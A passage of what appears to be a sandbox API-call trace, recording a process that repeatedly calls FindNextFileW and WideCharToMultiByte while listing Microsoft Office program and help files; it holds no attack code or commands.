lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATHEDITOR_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATHEDITOR_K_COL.HXK", lpUsedDefaultChar=0x0) returned 25 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATH_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATH_COL.HXC", lpUsedDefaultChar=0x0) returned 17 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATH_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATH_COL.HXT", lpUsedDefaultChar=0x0) returned 17 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATH_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATH_F_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INFOPATH_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INFOPATH_K_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INSTLIST.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INSTLIST.VRD", lpUsedDefaultChar=0x0) returned 13 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.261] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="INVENTRY.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="INVENTRY.VRD", lpUsedDefaultChar=0x0) returned 13 [0161.261] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Invite or Link.one", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Invite or Link.one", lpUsedDefaultChar=0x0) returned 19 [0161.281] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="IPDSINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPDSINTL.DLL", lpUsedDefaultChar=0x0) returned 13 [0161.281] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="IPEDINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPEDINTL.DLL", lpUsedDefaultChar=0x0) returned 13 [0161.281] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="IPOLKINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IPOLKINTL.DLL", lpUsedDefaultChar=0x0) returned 14 [0161.281] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Issue Tracking.gta", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Issue Tracking.gta", lpUsedDefaultChar=0x0) returned 19 [0161.281] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="JADE.CSS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JADE.CSS", lpUsedDefaultChar=0x0) returned 9 [0161.281] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LGND.VSL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LGND.VSL", lpUsedDefaultChar=0x0) returned 9 [0161.281] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MAPIR.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIR.DLL", lpUsedDefaultChar=0x0) returned 10 [0161.281] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MAPIR.DLL.IDX_DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPIR.DLL.IDX_DLL", lpUsedDefaultChar=0x0) returned 18 [0161.281] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MAPISHELLR.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MAPISHELLR.DLL", lpUsedDefaultChar=0x0) returned 15 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MERES.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MERES.DLL", lpUsedDefaultChar=0x0) returned 10 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MOR6INT.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOR6INT.DLL", lpUsedDefaultChar=0x0) returned 12 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MOR6INT.REST.IDX_DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOR6INT.REST.IDX_DLL", lpUsedDefaultChar=0x0) returned 21 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MOVE.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MOVE.VRD", lpUsedDefaultChar=0x0) returned 9 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MPXRES.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MPXRES.DLL", lpUsedDefaultChar=0x0) returned 11 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS.DEV.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.DEV.HXS", lpUsedDefaultChar=0x0) returned 17 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS.DEV_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.DEV_COL.HXC", lpUsedDefaultChar=0x0) returned 21 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS.DEV_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.DEV_COL.HXT", lpUsedDefaultChar=0x0) returned 21 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS.DEV_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.DEV_F_COL.HXK", lpUsedDefaultChar=0x0) returned 23 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS.DEV_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.DEV_K_COL.HXK", lpUsedDefaultChar=0x0) returned 23 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS.HXS", lpUsedDefaultChar=0x0) returned 13 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_COL.HXC", lpUsedDefaultChar=0x0) returned 17 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_COL.HXT", lpUsedDefaultChar=0x0) returned 17 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_F_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0161.282] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSACCESS_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSACCESS_K_COL.HXK", lpUsedDefaultChar=0x0) returned 19 [0161.283] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSAIN.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSAIN.DLL", lpUsedDefaultChar=0x0) returned 10 [0161.283] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSO.ACL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSO.ACL", lpUsedDefaultChar=0x0) returned 8 [0161.283] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSOUC.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC.HXS", lpUsedDefaultChar=0x0) returned 10 [0161.283] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_COL.HXC", lpUsedDefaultChar=0x0) returned 14 [0161.283] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSOUC_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_COL.HXT", lpUsedDefaultChar=0x0) returned 14 [0161.283] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSOUC_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_F_COL.HXK", lpUsedDefaultChar=0x0) returned 16 [0161.283] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSOUC_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSOUC_K_COL.HXK", lpUsedDefaultChar=0x0) returned 16 [0161.283] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB.DEV.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.DEV.HXS", lpUsedDefaultChar=0x0) returned 14 [0161.285] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB.DEV_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.DEV_COL.HXC", lpUsedDefaultChar=0x0) returned 18 [0161.285] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB.DEV_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.DEV_COL.HXT", lpUsedDefaultChar=0x0) returned 18 [0161.285] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB.DEV_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.DEV_F_COL.HXK", lpUsedDefaultChar=0x0) returned 20 [0161.285] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB.DEV_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.DEV_K_COL.HXK", lpUsedDefaultChar=0x0) returned 20 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.HXS", lpUsedDefaultChar=0x0) returned 10 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB.OPG", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB.OPG", lpUsedDefaultChar=0x0) returned 10 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_COL.HXC", lpUsedDefaultChar=0x0) returned 14 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_COL.HXT", lpUsedDefaultChar=0x0) returned 14 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_F_COL.HXK", lpUsedDefaultChar=0x0) returned 16 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSPUB_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSPUB_K_COL.HXK", lpUsedDefaultChar=0x0) returned 16 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSQRY32.CHM", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSQRY32.CHM", lpUsedDefaultChar=0x0) returned 12 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSTINTL.DLL", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSTINTL.DLL", lpUsedDefaultChar=0x0) returned 12 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSTORE.HXS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSTORE.HXS", lpUsedDefaultChar=0x0) returned 11 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSTORE_COL.HXC", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSTORE_COL.HXC", lpUsedDefaultChar=0x0) returned 15 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSTORE_COL.HXT", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSTORE_COL.HXT", lpUsedDefaultChar=0x0) returned 15 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSTORE_F_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSTORE_F_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="MSTORE_K_COL.HXK", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSTORE_K_COL.HXK", lpUsedDefaultChar=0x0) returned 17 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NETWORK.CSS", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK.CSS", lpUsedDefaultChar=0x0) returned 12 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NETWORK1.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK1.VRD", lpUsedDefaultChar=0x0) returned 13 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NETWORK2.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK2.VRD", lpUsedDefaultChar=0x0) returned 13 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) returned 1 [0161.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NETWORK3.VRD", cchWideChar=-1, lpMultiByteStr=0x326bee0, cbMultiByte=260, lpDefaultChar=0x326b6bf, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK3.VRD", lpUsedDefaultChar=0x0) returned 13 [0161.286] FindNextFileW (in: hFindFile=0x284d528, lpFindFileData=0x326b3d8 | out: lpFindFileData=0x326b3d8) 